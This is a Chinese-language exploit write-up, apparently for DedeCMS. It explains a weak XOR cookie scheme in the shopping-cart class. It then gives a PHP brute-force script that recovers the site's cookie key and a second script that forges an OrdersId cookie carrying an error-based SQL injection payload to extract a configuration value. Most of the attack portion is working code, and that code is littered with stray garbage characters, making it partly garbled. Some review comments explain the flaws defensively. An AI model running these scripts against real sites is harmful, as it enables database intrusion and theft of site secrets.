www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个shopcar类是如何生成cookie的
/**
 * Store a shop-cart value in a client cookie.
 *
 * Arrays are first flattened by enCode() (the surrounding text says it
 * yields an a=yy&b=cc&d=know style string); every value then goes through
 * enCrypt() before setcookie() writes it.
 *
 * @param string       $key   cookie name
 * @param array|string $value payload; arrays are passed through enCode() first
 *
 * NOTE(review): the cookie is written with path '/' and a 36000 s lifetime
 * only — no HttpOnly/Secure attributes are set here. enCrypt()/setKey()
 * apply XOR masks with no integrity check, so whatever is later read back
 * from this cookie has to be treated as attacker-controlled input.
 */
function saveCookie($key,$value)
{
    $payload = is_array($value)
        ? $this->enCrypt($this->enCode($value))
        : $this->enCrypt($value);
    setcookie($key, $payload, time() + 36000, '/');
}
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
/**
 * Obfuscate $txt with a per-call key, then apply the site-wide mask
 * (setKey()) and base64-encode the result.
 *
 * Layout of the intermediate string: for each input byte, the key byte
 * used is emitted in clear immediately before the XOR'd byte, i.e.
 * k0 (t0^k0) k1 (t1^k1) ... — the keystream is therefore part of the output.
 *
 * @param string $txt plaintext to encode
 * @return string base64 of setKey(keystream-interleaved XOR text)
 *
 * NOTE(review): the per-call key is md5(rand(0, 32000)) — at most 32001
 * possible values — and rand() seeded from microtime() is not a
 * cryptographic RNG. Because the key bytes are written next to the bytes
 * they mask and setKey() adds no MAC, the scheme offers obfuscation only;
 * an authenticated construction (e.g. hash_hmac over the payload, checked
 * with hash_equals on read) is what a cookie like this needs.
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $roundKey = md5(rand(0, 32000));
    $keyLen = strlen($roundKey);
    $n = strlen($txt);
    $out = '';
    for ($i = 0; $i < $n; $i++) {
        // Key position wraps every $keyLen bytes (32 for an md5 hex digest).
        $k = $roundKey[$i % $keyLen];
        $out .= $k . ($txt[$i] ^ $k);
    }
    return base64_encode($this->setKey($out));
}
/**
 * XOR $txt with the site-wide mask md5(strtolower($cfg_cookie_encode)),
 * repeating the 32-byte mask as needed.
 *
 * XOR is its own inverse, so setKey(setKey($x)) === $x; output length
 * equals input length.
 *
 * @param string $txt bytes to mask
 * @return string masked bytes (same length as $txt)
 *
 * NOTE(review): a fixed XOR mask with no authentication means one known
 * 32-byte plaintext/ciphertext pair reveals the whole mask. Reads from the
 * global $cfg_cookie_encode; if that config value is unset the mask is
 * md5('') for every request.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $mask = md5(strtolower($cfg_cookie_encode));
    $maskLen = strlen($mask);
    $n = strlen($txt);
    $out = '';
    for ($i = 0; $i < $n; $i++) {
        $out .= $txt[$i] ^ $mask[$i % $maskLen];
    }
    return $out;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
3 I+ |/ }' V0 L, D/ o! g' w% E<?php
. Q5 l+ F/ ^4 t+ E; z; ]$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
1 M y8 E" |- H; n5 h$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here( J! I0 D ]% I+ d G% p; y+ X. J. ?
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
, }7 H8 m: a& }' mfunction reStrCode($code,$string)
) i. W2 F9 g& m6 B+ j{2 y/ A) s& m1 R% ?, \' x; G5 o9 C
$code = base64_decode($code);
R( g" i7 W+ c q& n3 W$key = “”;
' e# L( u5 g6 C5 A$ Q( W. Cfor($i=0 ; $i<32 ; $i++)4 O- l7 P2 f% ?2 L+ A6 M: |% K# U5 Q
{
4 ~ H. \6 t& X5 g1 V$key .= $string[$i] ^ $code[$i];, f0 j! J5 ^; S7 d0 ~4 a* @
}( L# g* [$ ^ ?1 ?: i
return $key;
, n0 G+ n v& Y}
" v/ v# ^( l/ O! E8 ffunction getKeys($cookie,$plantxt), Q- \1 @: x+ n' }
{; I3 G, \2 F& y1 g
$tmp = $cookie;6 u6 R1 r" t, A. |. \
$results = array();6 Q- k& I( T7 T3 z/ I4 h* a# M
for($j=0 ; $j < 32000; $j++)
8 d9 p8 ?6 d6 R/ y) F' L% l: I{
. Q: f d* E' b7 S t9 x% H
% B H' S# f# {# Z- X+ O1 O- w$txt = $plantxt;* a Y+ y& D# |, S6 q: U; d0 ^
$ctr = 0;
+ h# l. x/ p7 A" f9 {$tmp = ”;
& ^& \1 b1 ~* k& Y% S# ^" _# M$encrypt_key = md5($j);
% a- x& |$ q6 B6 r5 {( D- V: ?6 ^% Vfor($i =0; $i < strlen($txt); $i ++)
2 W+ r x; p. M5 @{( P* U8 h2 [' |; |' ^; y* t, ]
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( S' h Y! [, k7 \0 F- e1 a$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ k: I ]# n1 r: I2 n# v7 U% F
}9 U5 _3 c7 i6 S* E+ w2 W0 _: X/ N$ t
$string = $tmp;
( I( d! n% @ R8 e- I' ]) r$code = $cookie;. L: ?/ b1 T7 ?2 ^$ W
$result = reStrCode($code,$string);
1 D& h9 q& v ~' h, c$ Zif(eregi(‘^[a-z0-9]+$’,$result)); p2 B% t" A8 b+ R
{
4 ?1 K3 Y% X. p- K' Recho $result.”\n”;
. i5 g+ |" b5 U" P6 h6 p( ^& i1 W$results[] = $result;; m U3 s) R" p! _. Q+ d5 V
}
/ s& T: R! F* U6 m! y. q V}
7 _. K- |* r, f, a' breturn $results;7 \8 ]( M/ m) j: P
}- {1 z V. Z) |+ X3 q" c" Q F
$results1 = getKeys($cookie1,$plantxt);8 p: b& _3 \9 Z( R$ d
$results2 = getKeys($cookie2,$plantxt);
7 ^' E6 M# v& p! Eprint “\n——————–real key————————–\n”;
9 Z6 C/ r2 E/ l0 Xforeach($results1 as $test1), ?; e- [* _8 H$ u
{
0 ^0 G% @. d# @1 g1 xforeach($results2 as $test2)
. o& a, I; l9 U3 t) \{
/ i0 A& J' e) l3 X2 dif($test1 == $test2)
$ [1 R3 O; t$ T/ h0 x7 r- H{
" E: \( M, S0 y9 B' T* [+ i4 s4 n Gecho $test1.”\n”;
( ?3 ]% _) g" B}
; n" {2 y1 N# B# ^9 ]/ Q}
' E( V' ^3 n9 O6 U0 l}
7 [+ k& k h8 t$ \* z?>% ~1 w# e2 {- J- j3 U1 u
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops
% _$ G7 s- Y4 {3 F0 z21 {
- }) {0 ?4 Q& r9 D22 var $OrdersId;% J( g) Y: U( y) H0 D3 b4 W
23 var $productsId;
G* C& V- }" S& D* Y9 k+ y- ?247 x' w0 A7 M8 x* \6 K1 t
/**
 * Bind the current order id from the "OrdersId" cookie; when that cookie
 * is absent or empty, create a fresh order id via MakeOrders().
 *
 * NOTE(review): $this->OrdersId is taken from a client-held cookie and,
 * per the carbuyaction.php excerpt on this page, later interpolated into
 * a SQL string (WHERE oid='$OrdersId'). getCookie()'s return value should
 * be validated against the expected id format before use, or the query
 * must be parameterised — the cookie encoding is not a trust boundary.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    // Guard clause: an existing (non-empty) cookie value is kept as-is.
    if (!empty($this->OrdersId)) {
        return;
    }
    $this->OrdersId = $this->MakeOrders();
}
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request; it comes straight from the "OrdersId" cookie (see MemberShops::__construct)
……
// NOTE(review): $OrdersId is spliced into the SQL text unescaped and
// unvalidated. Since it originates from a client cookie, this is the
// injection point described below; bind it as a query parameter or reject
// any value that does not match the expected order-id format.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
接着我们就可以注入了
通过利用下面代码生成cookie:
6 l5 [: h* P1 S<?php
7 A+ k8 ]* V7 I: k4 g$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;, U) h7 t, c) j# s1 E) }+ v& Y; W
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here' o! R! {/ }7 x5 G
function setKey($txt)2 y" E$ A& o5 o# Z7 X
{8 w4 U! k* }2 I- z
global $encrypt_key;
( b9 K# F& U6 L# ]7 U$ctr = 0;
) ]5 p- j1 m2 ~! A% J# _$ h0 ?$tmp = ”;
5 a( y; E' n* S3 T5 B$ w8 R( p9 P0 N5 U* Mfor($i = 0; $i < strlen($txt); $i++)+ N+ z9 W& o8 ?7 f7 y
{
0 m$ N7 C* Q$ T* v0 V: L# F) n$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* ~9 V) @4 @6 @0 _7 K0 ?
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];% |! ~1 H7 ^6 i/ n1 g
}
5 i: u8 w+ y e6 I/ r( xreturn $tmp;% \8 e. g5 w& E) F
}
- Y( t* C& x4 c' B+ a' v7 mfunction enCrypt($txt)2 E* V U. R9 M4 L5 Z# `' C: T8 \" p6 h
{. k1 e3 c/ n b/ K; c
srand((double)microtime() * 1000000);0 a2 t) ^" S( X: a
$encrypt_key = md5(rand(0, 32000));7 \% J, W, ~% M/ W% L+ @9 R
$ctr = 0;" x+ M: a) j6 ?, W0 C: ?' Y3 s
$tmp = ”;
0 q" r7 D ]7 y& Vfor($i = 0; $i < strlen($txt); $i++)& e( f+ [1 H+ [" g3 L
{! x; |5 X2 c+ ]. f6 H) l4 d( d' T
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* v9 b" }+ u+ q7 j
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
' {, Z% w5 Q* p4 _}/ S) r8 }9 ^, b* W7 Q& O
return base64_encode(setKey($tmp));! f0 i* x7 A Y% a6 r# P8 L
}
6 |: H6 S: J! j' u/ Hfor($dest =0;$dest = enCrypt($txt);)- T9 O( L7 X4 r
{
/ B7 y0 E2 i Z9 sif(!strpos($dest,’+'))
" l0 @3 R4 L( }# n9 Z. C3 l" m' `{' }2 [- ^" y* g1 v2 { h, S
break;
4 ]( n& g/ d4 z2 j* D}
& c4 v6 E# F9 P9 H6 \, x9 N}
# E% Y1 H; v/ u0 Lecho $dest.”\n”;
- [0 m: F& K' h8 t?>
/ a9 m- \! h( b+ d% _1 f; S5 m) S8 S5 Q
|